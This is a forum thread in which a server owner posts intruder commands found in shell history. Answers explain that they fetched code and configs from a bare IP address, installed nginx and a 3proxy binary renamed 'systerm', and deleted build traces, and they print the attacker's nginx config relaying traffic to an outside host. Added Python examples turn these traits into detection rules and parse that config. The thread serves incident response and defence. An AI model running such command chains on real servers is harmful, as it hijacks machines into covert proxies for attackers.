Command explanation

1

Somebody hacked my private server and I found the commands below in the command line history. Can anybody explain what this means?

1. wget http://sysoev.ru/nginx/nginx-0.7.64.tar.gz && tar zxf nginx-0.7.64.tar.gz && cd nginx-0.7.64 && ./configure --without-http_gzip_module --with-http_stub_status_module --without-http-cache ; make install && cd ../ && rm -fr ngi* && wget 94.75.210.13/nsm3.conf -O /usr/local/nginx/conf/nginx.conf && env -i /usr/local/nginx/sbin/nginx

and

2. wget 94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &

Mithun Sreedharan

Posted 2010-01-11T08:42:00.070

Reputation: 1 485

3 To be honest, one who has his own private server should at least know the meaning of 'wget' and 'tar'. – user1686 – 2010-01-11T13:08:25.060

1 To agree with the previous comment: from your comments here, you don't seem to have even a very basic idea of how to run a server or how to secure a server. You should shut it down and use a server that is run professionally. Odds are your own server is being used right now by either a spammer or a malware-spreader. Running a server badly is bad citizenship. – CarlF – 2010-01-11T15:10:07.403

1 @CarlF: I both agree and disagree with you. I agree because running a server badly lets one become a potential accomplice of some villain; I disagree because if Mithun keeps on trying, breaking and fixing, he will learn. @Mithun: On the other hand... RTFM FIRST! :D – dag729 – 2010-01-11T15:39:13.010

@dag729, I hope you're right, but ... someone who can't even type "man wget"? Wrong attitude. – CarlF – 2010-01-12T02:16:13.270

I know what wget, tar and man are but nothing about nginx and 3proxy; I just want to know what the intruder was actually trying to achieve – Mithun Sreedharan – 2010-01-12T03:37:07.590
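As an added example (not part of the question or of any answer), here is a small Python checker that turns the traits shared by the two command chains above into detection rules and runs them over shell-history lines: a download from a bare IP address, a build from source, deletion of the build tree, a write into a system path, a binary moved under a new name into /usr/local/bin, and execution with `env -i`. The rule names, the regular expressions and the "three or more rules" threshold are my own constructed heuristics; the sample history mixes the two chains quoted in the question with ordinary administrative lines.

```python
import re

# Heuristic patterns distilled from the two command chains quoted in the
# question. They are constructed for this example: each one alone is common
# in legitimate admin work, so a line is flagged only when several coincide.
RULES = {
    "download_from_bare_ip": re.compile(
        r"\b(?:wget|curl)\b[^&|;]*\b(?:https?://)?(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/"),
    "builds_from_source": re.compile(r"\./configure\b|\bmake\b"),
    "deletes_build_tree": re.compile(r"\brm\s+-(?:rf|fr)\b"),
    "runs_with_empty_env": re.compile(r"\benv\s+-i\b"),
    "writes_system_path": re.compile(r"-O\s+/(?:usr|etc|opt|var)/"),
    "installs_renamed_binary": re.compile(r"\bmv\s+\S+\s+/usr/local/bin/"),
}


def score_line(line):
    """Names of the rules that match one history line."""
    return [name for name, rx in RULES.items() if rx.search(line)]


def scan_history(lines, threshold=3):
    """Return (line_number, matched_rules) for every line that hits
    at least `threshold` rules; ordinary lines rarely hit more than one."""
    hits = []
    for number, line in enumerate(lines, start=1):
        matched = score_line(line)
        if len(matched) >= threshold:
            hits.append((number, matched))
    return hits


# Constructed sample history: four ordinary lines plus the two chains from the question.
SAMPLE_HISTORY = [
    "ls -la /var/log",
    "wget https://example.org/tools/src.tar.gz",
    "wget http://sysoev.ru/nginx/nginx-0.7.64.tar.gz && tar zxf nginx-0.7.64.tar.gz "
    "&& cd nginx-0.7.64 && ./configure --without-http_gzip_module "
    "--with-http_stub_status_module --without-http-cache ; make install && cd ../ "
    "&& rm -fr ngi* && wget 94.75.210.13/nsm3.conf -O /usr/local/nginx/conf/nginx.conf "
    "&& env -i /usr/local/nginx/sbin/nginx",
    "cd /tmp/build && ./configure && make",
    "wget 94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 "
    "&& make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ "
    "&& rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg "
    "&& env -i /usr/local/bin/systerm -p63222 &",
    "sudo apt-get update",
]

if __name__ == "__main__":
    # Feed your own ~/.bash_history one line per list element instead.
    for number, matched in scan_history(SAMPLE_HISTORY):
        print(f"history line {number}: {', '.join(matched)}")
```

The point of scoring rather than matching single patterns is that `make` or `rm -rf` on their own would flag half of any developer's history; what makes the quoted chains stand out is that download, build, cleanup, system write and `env -i` all appear in one line. Bear in mind that history files are trivially edited or disabled by an intruder, so a clean history proves nothing, as the asker's own later comment about the `last` command illustrates.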

Answers

4

Someone apparently downloaded and installed nginx (a webserver) and 3proxy (a proxy server).

So I guess your server is now used as an intermediate proxy by the hackers. Uninstalling and removing those servers would be the best course of action, methinks (in addition to tightening up your security, of course ;-).

fretje

Posted 2010-01-11T08:42:00.070

Reputation: 10 524

4 After removing those server processes and other changes you know about, I usually recommend backing up any data and rebuilding the server. It is the only way to be absolutely sure that no other holes have been left open by the invaders that they can use to get back in easily later. – David Spillett – 2010-01-11T09:08:13.137

I don't have an option to roll back, thinking of uninstalling nginx and 3proxy – Mithun Sreedharan – 2010-01-11T11:41:44.340

"I don't have an option to roll back, thinking of uninstalling nginx and 3proxy": but if someone was able to use wget, tar, configure and make install, one or more of your accounts with those permissions are compromised. I would disable the root account and remove any superuser permission from any other user but the very administrator. – dag729 – 2010-01-11T15:01:07.167

Also, another good comeback could be to just change "access_log off" and try to retrieve information about the cracker: then kick him in the ass! :D – dag729 – 2010-01-11T15:03:21.970

last command is disabled – Mithun Sreedharan – 2010-01-12T03:38:03.127

2

It is trying to install a webserver, and a proxy with the following settings:

user www-data;
worker_processes 2;
error_log logs/error.log notice;
worker_rlimit_nofile 10240;
events { worker_connections 8192; use epoll; }
http {
  include mime.types;
  access_log off;
  sendfile on;
  tcp_nopush on;
  tcp_nodelay on;
  keepalive_timeout 0;
  server_tokens off;
  server_names_hash_bucket_size 64;
  #//G
  deny 64.233.160.0/19;
  deny 66.102.0.0/20;
  deny 66.249.64.0/19;
  deny 72.14.192.0/18;
  deny 74.125.0.0/16;
  deny 89.207.224.0/24;
  deny 193.142.125.0/24;
  deny 194.110.194.0/24;
  deny 209.85.128.0/17;
  deny 216.239.32.0/19;
  server {
    listen 8080;
    location ~* ^.+\.(gif|png|jpg)$ {
      root /var/tmp/$host;
      error_page 404 = @fetch;
    }
    location @fetch {
      internal;
      proxy_pass http://serverparkhosting.com:4480;
      proxy_redirect off;
      proxy_ignore_client_abort on;
      proxy_set_header X-Real-IP $remote_addr;
      proxy_set_header Host $host;
      proxy_buffers 400 50k;
      proxy_read_timeout 300;
      proxy_send_timeout 300;
      proxy_store /var/tmp/$host/$uri;
      proxy_store_access user:rw group:rw all:r;
      root /var/tmp/$host;
    }
    location / {
      proxy_pass http://serverparkhosting.com:4480;
      proxy_redirect off;
      proxy_ignore_client_abort on;
      proxy_set_header X-Real-IP $remote_addr;
      proxy_set_header Host $host;
      proxy_buffers 100 50k;
      proxy_read_timeout 300;
      proxy_send_timeout 300;
    }
    location = /info { stub_status on; }
  }
}

William Hilsum

Posted 2010-01-11T08:42:00.070

Reputation: 111 572

Can you please explain what that proxy is used for? – Mithun Sreedharan – 2010-01-11T10:48:34.900
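To answer the follow-up question from the config itself, here is an added example (mine, not part of the answer above and not nginx's own tooling): a minimal parser for nginx's directive-and-block syntax, followed by a summary of the directives that say what this proxy does. The embedded config is the attacker's nginx.conf as quoted in the answer, only compacted onto fewer lines (nginx ends directives with `;`, so line breaks do not matter). The parser handles the general syntax (nested blocks, `#` comments), not just this file.

```python
import re

# The nginx.conf quoted in the answer above (the attacker's config, as posted
# on the page), compacted onto fewer lines; nginx terminates directives with ';'.
ATTACKER_CONF = r"""
user www-data; worker_processes 2; error_log logs/error.log notice;
worker_rlimit_nofile 10240;
events { worker_connections 8192; use epoll; }
http {
  include mime.types; access_log off; sendfile on; tcp_nopush on; tcp_nodelay on;
  keepalive_timeout 0; server_tokens off; server_names_hash_bucket_size 64;
  #//G
  deny 64.233.160.0/19; deny 66.102.0.0/20; deny 66.249.64.0/19; deny 72.14.192.0/18;
  deny 74.125.0.0/16; deny 89.207.224.0/24; deny 193.142.125.0/24;
  deny 194.110.194.0/24; deny 209.85.128.0/17; deny 216.239.32.0/19;
  server {
    listen 8080;
    location ~* ^.+\.(gif|png|jpg)$ { root /var/tmp/$host; error_page 404 = @fetch; }
    location @fetch {
      internal; proxy_pass http://serverparkhosting.com:4480; proxy_redirect off;
      proxy_ignore_client_abort on; proxy_set_header X-Real-IP $remote_addr;
      proxy_set_header Host $host; proxy_buffers 400 50k; proxy_read_timeout 300;
      proxy_send_timeout 300; proxy_store /var/tmp/$host/$uri;
      proxy_store_access user:rw group:rw all:r; root /var/tmp/$host;
    }
    location / {
      proxy_pass http://serverparkhosting.com:4480; proxy_redirect off;
      proxy_ignore_client_abort on; proxy_set_header X-Real-IP $remote_addr;
      proxy_set_header Host $host; proxy_buffers 100 50k; proxy_read_timeout 300;
      proxy_send_timeout 300;
    }
    location = /info { stub_status on; }
  }
}
"""


def tokenize(text):
    """Split config text into words and the structural tokens { } ;
    after dropping '#' comments (quoted strings are not needed for this file)."""
    tokens = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]
        tokens.extend(re.findall(r"[{};]|[^\s{};]+", line))
    return tokens


def parse(tokens):
    """Build a tree of (name, args, children); children is None for a plain directive."""
    stack = [[]]
    args = []
    for tok in tokens:
        if tok == "{":
            block = []
            stack[-1].append((args[0], args[1:], block))
            stack.append(block)
            args = []
        elif tok == "}":
            stack.pop()
        elif tok == ";":
            if args:
                stack[-1].append((args[0], args[1:], None))
            args = []
        else:
            args.append(tok)
    return stack[0]


def walk(block, path=()):
    """Yield (path_of_enclosing_blocks, name, args) for every directive, depth first."""
    for name, args, children in block:
        yield path, name, args
        if children is not None:
            yield from walk(children, path + (name,) + tuple(args))


def summarize(conf_text):
    """Pull out the directives that tell a responder what this proxy does."""
    report = {"listen": [], "proxy_pass": set(), "deny": [], "proxy_store": [],
              "status_pages": [], "access_log_off": False, "forwards_host_header": False}
    for path, name, args in walk(parse(tokenize(conf_text))):
        if name == "listen":
            report["listen"].extend(args)
        elif name == "proxy_pass":
            report["proxy_pass"].add(args[0])
        elif name == "deny":
            report["deny"].extend(args)
        elif name == "proxy_store":
            report["proxy_store"].extend(args)
        elif name == "stub_status":
            report["status_pages"].append(path[-1])   # the enclosing location's path
        elif name == "access_log" and args == ["off"]:
            report["access_log_off"] = True
        elif name == "proxy_set_header" and args[:1] == ["Host"]:
            report["forwards_host_header"] = True
    return report


if __name__ == "__main__":
    for key, value in summarize(ATTACKER_CONF).items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

Read together, the extracted directives describe a caching reverse proxy rather than a web site: nginx listens on port 8080, answers any hostname pointed at the box (the client's `Host` header is forwarded unchanged), fetches everything from serverparkhosting.com:4480, keeps copies of images under /var/tmp/$host so repeat requests never reach the upstream, writes no access log, and refuses the ten listed networks. Several of those ranges are well-known Google address blocks, which fits the `#//G` comment above them and suggests the operator wanted the proxied content kept away from search-engine crawlers. For the asker this means the compromised host was being used as a disposable front end for someone else's content, which is why the answers recommend removing the processes and rebuilding rather than merely reconfiguring.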

1

As others have said, your server has been compromised by someone else. Once you have recovered, either by removing and/or reinstalling, you should seriously consider implementing at least baseline security. A good place to start is the security manuals of your Linux distribution and maybe something like the tiger scripts.

Frank Kalis

Posted 2010-01-11T08:42:00.070

Reputation: 121